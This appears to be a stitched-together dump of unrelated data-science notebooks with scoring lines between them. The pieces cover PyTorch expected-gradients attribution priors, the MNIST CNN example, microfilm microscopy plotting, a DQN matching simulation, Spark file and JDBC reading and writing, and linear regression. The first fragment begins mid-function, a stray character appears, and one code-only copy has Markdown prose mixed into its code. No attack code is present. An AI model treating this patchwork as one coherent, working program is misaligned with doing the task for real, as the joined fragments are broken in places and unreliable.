return input_reference_interpolated
def diff_input_reference(self, input_data, reference_data):
return input_data.unsqueeze(1)-reference_data
def get_grad(self, model, input_reference_interpolated, valid_output):
input_reference_interpolated.requires_grad=True
input_reference_interpolated_grad=torch.zeros(input_reference_interpolated.shape).float().to(input_reference_interpolated.device)
for i in range(self.k):
batch_input=input_reference_interpolated[:,i,]
batch_output=model(batch_input)
if valid_output is None:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
else:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=valid_output,
create_graph=True)[0]
input_reference_interpolated_grad[:,i,]=grad_out
return input_reference_interpolated_grad
def attribution(self, model, input_data, valid_output=None):
model_dtype=next(model.parameters()).dtype
reference_data=self.get_reference_data().to(model_dtype).to(input_data.device)
assert input_data.dtype==model_dtype
assert input_data.shape[0]==self.batch_size
assert input_data.shape[1:]==reference_data.shape[1:]
assert input_data.device==next(model.parameters()).device
reference_data=reference_data.view(self.batch_size, self.k, *reference_data.shape[1:])
input_reference_interpolated=self.interpolate_input_reference(input_data, reference_data)
input_reference_diff=self.diff_input_reference(input_data, reference_data)
input_reference_interpolated_grad=self.get_grad(model, input_reference_interpolated, valid_output)
diff_interpolated_grad=input_reference_diff*input_reference_interpolated_grad
expected_grad=diff_interpolated_grad.mean(axis=1)
return expected_grad
"""
if list(batch_output.shape[1:])==[1]:
# scalar output
else:
# vector output
if grad_output is None:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
else:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=grad_outputs.to(input_reference_interpolated.device),
create_graph=True)[0]
def gather_nd(self,params, indices):
max_value = functools.reduce(operator.mul, list(params.size())) - 1
indices = indices.t().long()
ndim = indices.size(0)
idx = torch.zeros_like(indices[0]).long()
m = 1
for i in range(ndim)[::-1]:
idx += indices[i]*m
m *= params.size(i)
idx[idx < 0] = 0
idx[idx > max_value] = 0
return torch.take(params, idx)
sample_indices=torch.arange(0,batch_output.size(0)).to(input_reference_interpolated.device)
indices_tensor=torch.cat([sample_indices.unsqueeze(1),
sparse_output.unsqueeze(1).to(input_reference_interpolated.device)],dim=1)
batch_output=self.gather_nd(batch_output, indices_tensor)
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
print('a',torch.ones_like(batch_output).to(input_reference_interpolated.device).shape)
print('equal',np.all((grad_out==grad_out2).cpu().numpy()))
"""
optimizer1.param_groups[0]['amsgrad']
optimizer2 = torch.optim.Adam(model.parameters(), lr=1e-4)
scheduler2 = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimizer2, gamma=0.95)
#scheduler1 = torch.optim.lr_scheduler.StepLR(optimizer1, step_size=5, gamma=0.5)
optimizer2.param_groups[0]['params'][-1]
len(optimizer1.param_groups)
scheduler1.get_last_lr()
scheduler1.step()
optimizer1.param_groups[0]['initial_lr']
optimizer1.param_groups[0]['lr']
test_dataset
device=torch.device('cuda')
convergence_list1_list_eg=[]
convergence_list2_list_eg=[]
convergence_list3_list_eg=[]
for k in [1,2,3,4,5]:
print('k =',k)
model=MLP().to(device)
with torch.no_grad():
model.layers[0].weight[0,0]=10
model.layers[0].weight[0,1]=10
model.layers[0].bias[0]=-6
x_zeros = torch.ones_like(x_train[:,:])
background_dataset = BinaryData(x_zeros)
explainer = AttributionPriorExplainer(background_dataset, 64, k=k)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)
bce_term = torch.nn.BCELoss()
train_loss_list_mean_list=[]
convergence_list1=[]
convergence_list2=[]
convergence_list3=[]
for epoch in range(200):
train_loss_list=[]
for i, (x, y_true) in enumerate(train_loader):
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
eg_abs_mean=eg.abs().mean(0)
loss=bce_term(y_pred, y_true.unsqueeze(1)) + eg_abs_mean[1]
loss.backward(retain_graph=True)
optimizer.step()
train_loss_list.append(loss.item())
train_loss_list_mean=np.mean(train_loss_list)
train_loss_list_mean_list.append(train_loss_list_mean)
convergence_list1.append(calculate_dependence(model)[0])
convergence_list2.append(calculate_dependence(model)[1])
convergence_list3.append(calculate_dependence(model)[2])
convergence_list1_list_eg.append(convergence_list1)
convergence_list2_list_eg.append(convergence_list2)
convergence_list3_list_eg.append(convergence_list3)
model(img),model(img).shape
model(img).shape
img.shape
train_dataloader=DataLoader(dataset=train_dataset, batch_size=10)
for img,label in train_dataloader:
print(img)
break
torch.nn.MaxPool2d(kernel_size=2, padding='valid')
torch.nn.MaxPool2d(kernel_size=2)
train_dataloader=DataLoader(dataset=train_dataset, batch_size=10)
loss_func=torch.nn.CrossEntropyLoss()
for images, labels_true in train_dataloader:
images=images
labels_pred=model.forward(images)
print(labels_pred.shape)
loss_func(labels_pred, labels_true)
import tensorflow as tf
image = tf.constant(np.arange(1, 24+1, dtype=np.int32), shape=[2,2, 2, 3])
new_image = tf.image.per_image_standardization(image)
np.var(new_image[0])
new_image
np.var(new_image)
torch.nn.Dropout?
import torch
torch.nn.Conv2d??
from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, 1)
self.conv2 = nn.Conv2d(32, 64, 3, 1)
self.dropout1 = nn.Dropout(0.25)
self.dropout2 = nn.Dropout(0.5)
self.fc1 = nn.Linear(9216, 128)
self.fc2 = nn.Linear(128, 10)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = F.max_pool2d(x, 2)
x = self.dropout1(x)
x = torch.flatten(x, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.dropout2(x)
x = self.fc2(x)
output = F.log_softmax(x, dim=1)
return output
def train(args, model, device, train_loader, optimizer, epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
if args.dry_run:
break
def test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset1 = datasets.MNIST('../data', train=True, download=True,
transform=transform)
dataset2 = datasets.MNIST('../data', train=False,
transform=transform)
model = Net()
train_loader = torch.utils.data.DataLoader(dataset1,batch_size=64)
test_loader = torch.utils.data.DataLoader(dataset2, batch_size=1000)
device=torch.device('cuda')
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
break
data.shape
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=14, metavar='N',
help='number of epochs to train (default: 14)')
parser.add_argument('--lr', type=float, default=1.0, metavar='LR',
help='learning rate (default: 1.0)')
parser.add_argument('--gamma', type=float, default=0.7, metavar='M',
help='Learning rate step gamma (default: 0.7)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--dry-run', action='store_true', default=False,
help='quickly check a single pass')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--save-model', action='store_true', default=False,
help='For Saving the current Model')
args = parser.parse_args()
use_cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
device = torch.device("cuda" if use_cuda else "cpu")
train_kwargs = {'batch_size': args.batch_size}
test_kwargs = {'batch_size': args.test_batch_size}
if use_cuda:
cuda_kwargs = {'num_workers': 1,
'pin_memory': True,
'shuffle': True}
train_kwargs.update(cuda_kwargs)
test_kwargs.update(cuda_kwargs)
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset1 = datasets.MNIST('../data', train=True, download=True,
transform=transform)
dataset2 = datasets.MNIST('../data', train=False,
transform=transform)
train_loader = torch.utils.data.DataLoader(dataset1,**train_kwargs)
test_loader = torch.utils.data.DataLoader(dataset2, **test_kwargs)
model = Net().to(device)
optimizer = optim.Adadelta(model.parameters(), lr=args.lr)
scheduler = StepLR(optimizer, step_size=1, gamma=args.gamma)
for epoch in range(1, args.epochs + 1):
train(args, model, device, train_loader, optimizer, epoch)
test(model, device, test_loader)
scheduler.step()
if args.save_model:
torch.save(model.state_dict(), "mnist_cnn.pt")
"""
https://github.com/suinleelab/attributionpriors/blob/master/attributionpriors/pytorch_ops.py
https://github.com/slundberg/shap/blob/master/shap/explainers/_gradient.py
"""
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader
class AttributionPriorExplainer():
def __init__(self, reference_dataset, batch_size, k):
self.reference_dataloader=DataLoader(dataset=reference_dataset,
batch_size=batch_size*k,
shuffle=True,
drop_last=True)
self.reference_dataloader_iterator=iter(self.reference_dataloader)
self.batch_size=batch_size
self.k=k
def get_reference_data(self):
try:
reference_data=next(self.reference_dataloader_iterator)
except:
self.reference_dataloader_iterator=iter(self.reference_dataloader)
reference_data=next(self.reference_dataloader_iterator)
return reference_data
def interpolate_input_reference(self, input_data, reference_data):
alpha=torch.empty(self.batch_size, self.k).uniform_(0,1).to(input_data.device)
alpha=alpha.view(*([self.batch_size, self.k,]+[1]*len(input_data.shape[1:])))
input_reference_interpolated=(1-alpha)*reference_data+(alpha)*input_data.unsqueeze(1)
return input_reference_interpolated
def diff_input_reference(self, input_data, reference_data):
return input_data.unsqueeze(1)-reference_data
def get_grad(self, model, input_reference_interpolated):
input_reference_interpolated.requires_grad=True
input_reference_interpolated_grad=torch.zeros(input_reference_interpolated.shape).float().to(input_reference_interpolated.device)
for i in range(self.k):
batch_input=input_reference_interpolated[:,i,]
batch_output=model(batch_input)
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
input_reference_interpolated_grad[:,i,]=grad_out
return input_reference_interpolated_grad
def attribution(self, model, input_data):
model_dtype=next(model.parameters()).dtype
reference_data=self.get_reference_data().to(model_dtype).to(input_data.device)
assert input_data.dtype==model_dtype
assert input_data.shape[0]==self.batch_size
assert input_data.shape[1:]==reference_data.shape[1:]
assert input_data.device==next(model.parameters()).device
reference_data=reference_data.view(self.batch_size, self.k, *reference_data.shape[1:])
input_reference_interpolated=self.interpolate_input_reference(input_data, reference_data)
input_reference_diff=self.diff_input_reference(input_data, reference_data)
input_reference_interpolated_grad=self.get_grad(model, input_reference_interpolated)
diff_interpolated_grad=input_reference_diff*input_reference_interpolated_grad
expected_grad=diff_interpolated_grad.mean(axis=1)
return expected_grad
ใ
| 0.604516 | 0.52476 |
# Create your first plots
Imagine that you have acquired some microscopy data. First you import those as Numpy arrays. We do that here by using scikit-image and an online dataset but you are free to import your data as you want:
```
import skimage.io
image = skimage.io.imread('https://github.com/guiwitz/microfilm/raw/master/demodata/coli_nucl_ori_ter.tif')
image.shape
```
We have an image with 3 channels and 30 time points. To create a simple plot, we only take the first time point:
```
image_t0 = image[:,0,:,:]
```
Now we can import the microfilm package. For simple plots, we only need the ```microshow``` function of the ```microfilm.microplot``` submodule:
```
from microfilm.microplot import microshow
```
Plotting a color composite image of our numpy array is now as easy as using:
```
microshow(image_t0);
```
With a few options more we can change the colormaps and add information on the figure:
```
microshow(image_t0, cmaps=['Greys','pure_cyan','pure_magenta'], flip_map=False,
label_text='A', label_color='black', channel_label_show=True, channel_names=['TFP','CFP','mCherry'],
unit='um', scalebar_unit_per_pix=0.06, scalebar_size_in_units=3, scalebar_color='black', scalebar_font_size=0.05);
```
In addition to single plots, you can also create panels and animations. For that, we first import additional parts of the package. The panel object:
```
from microfilm.microplot import Micropanel
```
And the animation module:
```
from microfilm.microanim import Microanim
```
Let's first look at panels. Imagine that you want to display the two channels separately in a figure. You first start by creating each element of your figure and adjust it as you want:
```
from microfilm.microplot import Microimage
microim1 = microshow(image_t0[1], cmaps='pure_cyan', label_text='A', channel_names='CFP')
microim2 = microshow(image_t0[2], cmaps='pure_magenta', label_text='B', channel_names='mCherry')
```
And now you create your panel, specifying the grid that you want and using the ```add_element``` method to add each of your figure to the panel object:
```
panel = Micropanel(rows=1, cols=2, figscaling=3)
panel.add_element([0,0], microim1);
panel.add_element([0,1], microim2);
panel.add_channel_label()
```
```microfilm``` takes care of setting the figure at the right size, avoiding blank, space, adjusting the labels etc.
Finally, with almost the same commands, you can create an animation object. Now, you have to provide the compelete array and not just a singe time point. In a Jupyter notebook, you can create an interactive figure, but here we just create the animation, save it and reload it.
We create the animation in three steps:
- first we create an animation object with the same options as used for a regular figure (we use only two channels here)
- second we add a time-stamp with the specific ```add_time_stamp``` method
- third we save the animation as a gif
```
anim = Microanim(
image[[1,2],:, :,:], cmaps=['pure_cyan','pure_magenta'], flip_map=False, fig_scaling=5,
label_text='A', unit='um', scalebar_unit_per_pix=0.065, scalebar_size_in_units=3, scalebar_font_size=0.05)
anim.add_time_stamp(unit='MM', unit_per_frame=3, location='upper right')
anim.save_movie('first_anim.mp4', quality=9)
from IPython.display import Video
Video('https://github.com/guiwitz/microfilm/raw/master/docs/first_anim.mp4')
```
## Next steps
You can find more details on how to create these plots and the fucntions of the module in [this more in-depth guide](../notebooks/create_plots.ipynb).
You can also discover how to go beyone single plots:
- [if you have time-lapse data you can animate such plots and export them as movies](../notebooks/create_animations.ipynb)
- [you can combine multiple plots into a figure with several panels](../notebooks/create_panels.ipynb)
|
github_jupyter
|
import skimage.io
image = skimage.io.imread('https://github.com/guiwitz/microfilm/raw/master/demodata/coli_nucl_ori_ter.tif')
image.shape
image_t0 = image[:,0,:,:]
from microfilm.microplot import microshow
microshow(image_t0);
microshow(image_t0, cmaps=['Greys','pure_cyan','pure_magenta'], flip_map=False,
label_text='A', label_color='black', channel_label_show=True, channel_names=['TFP','CFP','mCherry'],
unit='um', scalebar_unit_per_pix=0.06, scalebar_size_in_units=3, scalebar_color='black', scalebar_font_size=0.05);
from microfilm.microplot import Micropanel
from microfilm.microanim import Microanim
from microfilm.microplot import Microimage
microim1 = microshow(image_t0[1], cmaps='pure_cyan', label_text='A', channel_names='CFP')
microim2 = microshow(image_t0[2], cmaps='pure_magenta', label_text='B', channel_names='mCherry')
panel = Micropanel(rows=1, cols=2, figscaling=3)
panel.add_element([0,0], microim1);
panel.add_element([0,1], microim2);
panel.add_channel_label()
anim = Microanim(
image[[1,2],:, :,:], cmaps=['pure_cyan','pure_magenta'], flip_map=False, fig_scaling=5,
label_text='A', unit='um', scalebar_unit_per_pix=0.065, scalebar_size_in_units=3, scalebar_font_size=0.05)
anim.add_time_stamp(unit='MM', unit_per_frame=3, location='upper right')
anim.save_movie('first_anim.mp4', quality=9)
from IPython.display import Video
Video('https://github.com/guiwitz/microfilm/raw/master/docs/first_anim.mp4')
| 0.467332 | 0.986044 |
```
import numpy as np
import tensorflow as tf
from numpy.random import rand, randint
from src.environment.matching import simple_matching
from src.agent.dqn.dqn import exp_replay
from src.agent.dqn.models import MLP
def action2matching(n, action):
m = np.zeros((n,n))
m[int(action/n), action%n] = 1
return m
def run_sim(env, agent, steps = 100, disable_training = False):
last_observation = None
last_action = None
for s in range(steps):
new_observation = env.observe()
reward = env.collect_reward()
# store last transition
if last_observation is not None:
agent.store(last_observation, last_action, reward, new_observation)
# act
new_action = agent.action(new_observation)
env.perform_action(action2matching(len(g.types), new_action))
#train
if not disable_training:
agent.training_step()
# update current state as last state.
last_action = new_action
last_observation = new_observation
types = np.array([1,2,3])
weight_matrix = np.array([[0,1,2],[-1,0,0],[-1,-1,0]])
#make the weights under diagonal negative enforces that matches are counted only once
arrival_probabilities = np.array([0.2,0.5,0.2])
departure_probabilities = np.array([0.002,0.002,0.006])
g = simple_matching(types, weight_matrix, arrival_probabilities, departure_probabilities)
g.num_actions
g.observation_shape
tf.reset_default_graph()
session = tf.InteractiveSession()
# Brain maps from observation to Q values for different actions.
# Here it is a done using a multi layer perceptron with 2 hidden
# layers
brain = MLP(list(g.observation_shape), [200, 200, g.num_actions], # change size to larger observation arrays
[tf.tanh, tf.tanh, tf.identity])
# The optimizer to use. Here we use RMSProp as recommended
# by the publication
optimizer = tf.train.RMSPropOptimizer(learning_rate= 0.001, decay=0.9)
# DiscreteDeepQ object
current_controller = exp_replay(g.observation_shape, g.num_actions, brain, optimizer, session,
discount_rate=0.99, exploration_period=5000, max_experience=10000,
store_every_nth=4, train_every_nth=4)
session.run(tf.initialize_all_variables())
session.run(current_controller.target_network_update)
obs = g.observe()
current_controller.action(obs)
a = np.zeros((2,3))
a[np.newaxis,:]
run_sim(g, current_controller, 10000)
g.state
g.total_reward
```
|
github_jupyter
|
import numpy as np
import tensorflow as tf
from numpy.random import rand, randint
from src.environment.matching import simple_matching
from src.agent.dqn.dqn import exp_replay
from src.agent.dqn.models import MLP
def action2matching(n, action):
m = np.zeros((n,n))
m[int(action/n), action%n] = 1
return m
def run_sim(env, agent, steps = 100, disable_training = False):
last_observation = None
last_action = None
for s in range(steps):
new_observation = env.observe()
reward = env.collect_reward()
# store last transition
if last_observation is not None:
agent.store(last_observation, last_action, reward, new_observation)
# act
new_action = agent.action(new_observation)
env.perform_action(action2matching(len(g.types), new_action))
#train
if not disable_training:
agent.training_step()
# update current state as last state.
last_action = new_action
last_observation = new_observation
types = np.array([1,2,3])
weight_matrix = np.array([[0,1,2],[-1,0,0],[-1,-1,0]])
#make the weights under diagonal negative enforces that matches are counted only once
arrival_probabilities = np.array([0.2,0.5,0.2])
departure_probabilities = np.array([0.002,0.002,0.006])
g = simple_matching(types, weight_matrix, arrival_probabilities, departure_probabilities)
g.num_actions
g.observation_shape
tf.reset_default_graph()
session = tf.InteractiveSession()
# Brain maps from observation to Q values for different actions.
# Here it is a done using a multi layer perceptron with 2 hidden
# layers
brain = MLP(list(g.observation_shape), [200, 200, g.num_actions], # change size to larger observation arrays
[tf.tanh, tf.tanh, tf.identity])
# The optimizer to use. Here we use RMSProp as recommended
# by the publication
optimizer = tf.train.RMSPropOptimizer(learning_rate= 0.001, decay=0.9)
# DiscreteDeepQ object
current_controller = exp_replay(g.observation_shape, g.num_actions, brain, optimizer, session,
discount_rate=0.99, exploration_period=5000, max_experience=10000,
store_every_nth=4, train_every_nth=4)
session.run(tf.initialize_all_variables())
session.run(current_controller.target_network_update)
obs = g.observe()
current_controller.action(obs)
a = np.zeros((2,3))
a[np.newaxis,:]
run_sim(g, current_controller, 10000)
g.state
g.total_reward
| 0.593845 | 0.37399 |
# Chapter 9
## Reading and Writing data in Spark
### Reading
```python
spark.read.format("csv")
.option("mode", "FAILFAST")
.option("inferSchema", "true")
.option("path", "path/to/file(s)")
.schema(someSchema)
.load()
```
### Writing
```python
dataframe.write.format("csv")
.option("mode", "OVERWRITE")
.option("dateFormat", "yyyy-MM-dd")
.option("path", "path/to/file(s)")
.save()
```
```
import os
os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.postgresql:postgresql:42.1.1 pyspark-shell'
```
### Example for reading and writing `CSVs`
```
# Reading data from Google Cloud Storage
csvFile = spark.read.format("csv")\
.option("header", "true")\
.option("mode", "FAILFAST")\
.option("inferSchema", "true")\
.load("gs://reddys-data-for-experimenting/flight-data/csv/2010-summary.csv")
csvFile.printSchema()
# Writing data back to Google Cloud Storage
csvFile.write.format("csv") \
.mode("overwrite") \
.option("sep", "\t") \
.save("gs://reddys-data-for-experimenting/output/chapter9/tsv")
```
### Example for reading and writing `JSON`
```
# Reading data from Google Cloud Storage
jsonData = spark.read.format("json").option("mode", "FAILFAST")\
.option("inferSchema", "true")\
.load("gs://reddys-data-for-experimenting/flight-data/json/2010-summary.json")
jsonData.printSchema()
jsonData.write.format("json").mode("overwrite").save("gs://reddys-data-for-experimenting/output/chapter9/json")
```
### Example for reading and writing `Parquet`
```
parquetData = spark.read.format("parquet")\
.load("gs://reddys-data-for-experimenting/flight-data/parquet/2010-summary.parquet")
parquetData.write.format("json").mode("overwrite").save("gs://reddys-data-for-experimenting/output/chapter9/parquet")
```
### Example for reading and writing `ORC`
```
orcData = spark.read.format("orc").load("gs://reddys-data-for-experimenting/flight-data/orc/2010-summary.orc")
orcData.write.format("json").mode("overwrite").save("gs://reddys-data-for-experimenting/output/chapter9/orc")
```
### Example for Reading and writing with `JDBC`
Code snippet
``` python
driver = "org.sqlite.JDBC"
path = "gs://reddys-data-for-experimenting//flight-data/jdbc/my-sqlite.db"
url = "jdbc:sqlite:" + path
tablename = "flight_info"
dbDataFrame = spark.read.format("jdbc").option("url", url)\
.option("dbtable", tablename).option("driver", driver).load()
pgDF = spark.read.format("jdbc")\
.option("driver", "org.postgresql.Driver")\
.option("url", "jdbc:postgresql://database_server")\
.option("dbtable", "schema.tablename")\
.option("user", "username").option("password", "my-secret-password").load()
```
Also Spark does query push down, so that it fetches as little data as possible from the underlying datasource.
You can also write to SQL Databases usinf spark
```python
csvFile.write.jdbc(newPath, tablename, mode="overwrite", properties=props)
```
### Writing data into partitions
```
csvFile.repartition(5).write.format("csv") \
.save("gs://reddys-data-for-experimenting/output/chapter9/partitioned-csv")
csvFile.write.mode("overwrite").partitionBy("DEST_COUNTRY_NAME")\
.save("gs://reddys-data-for-experimenting/output/chapter9/partitioned-by-key-parquet")
```
### Writing data into buckets
Bukceting is only supported in `Scala` and not in `Python` at the moment
```scala
val numberBuckets = 10
val columnToBucketBy = "count"
csvFile.write.format("parquet")
.mode("overwrite")
.bucketBy(numberBuckets, columnToBucketBy)
.save("gs://reddys-data-for-experimenting/output/chapter9/partitioned-csv")
```
|
github_jupyter
|
spark.read.format("csv")
.option("mode", "FAILFAST")
.option("inferSchema", "true")
.option("path", "path/to/file(s)")
.schema(someSchema)
.load()
dataframe.write.format("csv")
.option("mode", "OVERWRITE")
.option("dateFormat", "yyyy-MM-dd")
.option("path", "path/to/file(s)")
.save()
import os
os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.postgresql:postgresql:42.1.1 pyspark-shell'
# Reading data from Google Cloud Storage
csvFile = spark.read.format("csv")\
.option("header", "true")\
.option("mode", "FAILFAST")\
.option("inferSchema", "true")\
.load("gs://reddys-data-for-experimenting/flight-data/csv/2010-summary.csv")
csvFile.printSchema()
# Writing data back to Google Cloud Storage
csvFile.write.format("csv") \
.mode("overwrite") \
.option("sep", "\t") \
.save("gs://reddys-data-for-experimenting/output/chapter9/tsv")
# Reading data from Google Cloud Storage
jsonData = spark.read.format("json").option("mode", "FAILFAST")\
.option("inferSchema", "true")\
.load("gs://reddys-data-for-experimenting/flight-data/json/2010-summary.json")
jsonData.printSchema()
jsonData.write.format("json").mode("overwrite").save("gs://reddys-data-for-experimenting/output/chapter9/json")
parquetData = spark.read.format("parquet")\
.load("gs://reddys-data-for-experimenting/flight-data/parquet/2010-summary.parquet")
parquetData.write.format("json").mode("overwrite").save("gs://reddys-data-for-experimenting/output/chapter9/parquet")
orcData = spark.read.format("orc").load("gs://reddys-data-for-experimenting/flight-data/orc/2010-summary.orc")
orcData.write.format("json").mode("overwrite").save("gs://reddys-data-for-experimenting/output/chapter9/orc")
Also Spark does query push down, so that it fetches as little data as possible from the underlying datasource.
You can also write to SQL Databases usinf spark
### Writing data into partitions
### Writing data into buckets
Bukceting is only supported in `Scala` and not in `Python` at the moment
| 0.369201 | 0.713157 |
```
import torch
import numpy as np
# Input (temp, rainfall, humidity)
inputs = np.array([[73, 67, 43],
[91, 88, 64],
[87, 134, 58],
[102, 43, 37],
[69, 96, 70]], dtype='float32')
# Targets (apples, oranges)
targets = np.array([[56, 70],
[81, 101],
[119, 133],
[22, 37],
[103, 119]], dtype='float32')
# Convert inputs and targets to tensors
inputs = torch.from_numpy(inputs)
targets = torch.from_numpy(targets)
print(inputs)
print(targets)
# Weights and biases
w = torch.randn(2, 3, requires_grad=True)
b = torch.randn(2, requires_grad=True)
print(w)
print(b)
def model(x):
return x @ w.t() + b
# Generate predictions
preds = model(inputs)
print(preds)
# Compare with targets
print(targets)
# MSE loss
def mse(t1, t2):
diff = t1 - t2
return torch.sum(diff * diff) / diff.numel()
# Train for 100 epochs
for i in range(500):
preds = model(inputs)
loss = mse(preds, targets)
loss.backward()
with torch.no_grad():
w -= w.grad * 1e-5
b -= b.grad * 1e-5
w.grad.zero_()
b.grad.zero_()
# Calculate loss
preds = model(inputs)
loss = mse(preds, targets)
print(loss)
# Predictions
preds
# Targets
targets
```
## Using Builtins
```
import torch.nn as nn
import torch
import numpy as np
# Input (temp, rainfall, humidity)
inputs = np.array([[73, 67, 43],
[91, 88, 64],
[87, 134, 58],
[102, 43, 37],
[69, 96, 70],
[74, 66, 43],
[91, 87, 65],
[88, 134, 59],
[101, 44, 37],
[68, 96, 71],
[73, 66, 44],
[92, 87, 64],
[87, 135, 57],
[103, 43, 36],
[68, 97, 70]],
dtype='float32')
# Targets (apples, oranges)
targets = np.array([[56, 70],
[81, 101],
[119, 133],
[22, 37],
[103, 119],
[57, 69],
[80, 102],
[118, 132],
[21, 38],
[104, 118],
[57, 69],
[82, 100],
[118, 134],
[20, 38],
[102, 120]],
dtype='float32')
inputs = torch.from_numpy(inputs)
targets = torch.from_numpy(targets)
inputs
from torch.utils.data import TensorDataset
# Define dataset
train_ds = TensorDataset(inputs, targets)
train_ds[0:3]
from torch.utils.data import DataLoader
# Define data loader
batch_size = 5
train_dl = DataLoader(train_ds, batch_size, shuffle=True)
for xb, yb in train_dl:
print(xb)
print(yb)
break
# Define model
model = nn.Linear(3, 2)
print(model.weight)
print(model.bias)
# Parameters
list(model.parameters())
# Generate predictions
preds = model(inputs)
preds
# Import nn.functional
import torch.nn.functional as F
# Define loss function
loss_fn = F.mse_loss
loss = loss_fn(model(inputs), targets)
print(loss)
# Define optimizer
opt = torch.optim.SGD(model.parameters(), lr=1e-5)
from tqdm import tqdm
# Utility function to train the model
def fit(num_epochs, model, loss_fn, opt, train_dl):
# Repeat for given number of epochs
for epoch in tqdm(range(num_epochs)):
# Train with batches of data
for xb,yb in train_dl:
# 1. Generate predictions
pred = model(xb)
# 2. Calculate loss
loss = loss_fn(pred, yb)
# 3. Compute gradients
loss.backward()
# 4. Update parameters using gradients
opt.step()
# 5. Reset the gradients to zero
opt.zero_grad()
# Print the progress
if (epoch+1) % 10 == 0:
print(' | Epoch [{}/{}], Loss: {:.4f}'.format(epoch+1, num_epochs, loss.item()))
fit(100, model, loss_fn, opt, train_dl)
# Generate predictions
preds = model(inputs)
preds
# Compare with targets
targets
model(torch.tensor([[75, 63, 44.]]))
```
|
github_jupyter
|
import torch
import numpy as np
# Input (temp, rainfall, humidity)
inputs = np.array([[73, 67, 43],
[91, 88, 64],
[87, 134, 58],
[102, 43, 37],
[69, 96, 70]], dtype='float32')
# Targets (apples, oranges)
targets = np.array([[56, 70],
[81, 101],
[119, 133],
[22, 37],
[103, 119]], dtype='float32')
# Convert inputs and targets to tensors
inputs = torch.from_numpy(inputs)
targets = torch.from_numpy(targets)
print(inputs)
print(targets)
# Weights and biases
w = torch.randn(2, 3, requires_grad=True)
b = torch.randn(2, requires_grad=True)
print(w)
print(b)
def model(x):
return x @ w.t() + b
# Generate predictions
preds = model(inputs)
print(preds)
# Compare with targets
print(targets)
# MSE loss
def mse(t1, t2):
diff = t1 - t2
return torch.sum(diff * diff) / diff.numel()
# Train for 100 epochs
for i in range(500):
preds = model(inputs)
loss = mse(preds, targets)
loss.backward()
with torch.no_grad():
w -= w.grad * 1e-5
b -= b.grad * 1e-5
w.grad.zero_()
b.grad.zero_()
# Calculate loss
preds = model(inputs)
loss = mse(preds, targets)
print(loss)
# Predictions
preds
# Targets
targets
import torch.nn as nn
import torch
import numpy as np
# Input (temp, rainfall, humidity)
inputs = np.array([[73, 67, 43],
[91, 88, 64],
[87, 134, 58],
[102, 43, 37],
[69, 96, 70],
[74, 66, 43],
[91, 87, 65],
[88, 134, 59],
[101, 44, 37],
[68, 96, 71],
[73, 66, 44],
[92, 87, 64],
[87, 135, 57],
[103, 43, 36],
[68, 97, 70]],
dtype='float32')
# Targets (apples, oranges)
targets = np.array([[56, 70],
[81, 101],
[119, 133],
[22, 37],
[103, 119],
[57, 69],
[80, 102],
[118, 132],
[21, 38],
[104, 118],
[57, 69],
[82, 100],
[118, 134],
[20, 38],
[102, 120]],
dtype='float32')
inputs = torch.from_numpy(inputs)
targets = torch.from_numpy(targets)
inputs
from torch.utils.data import TensorDataset
# Define dataset
train_ds = TensorDataset(inputs, targets)
train_ds[0:3]
from torch.utils.data import DataLoader
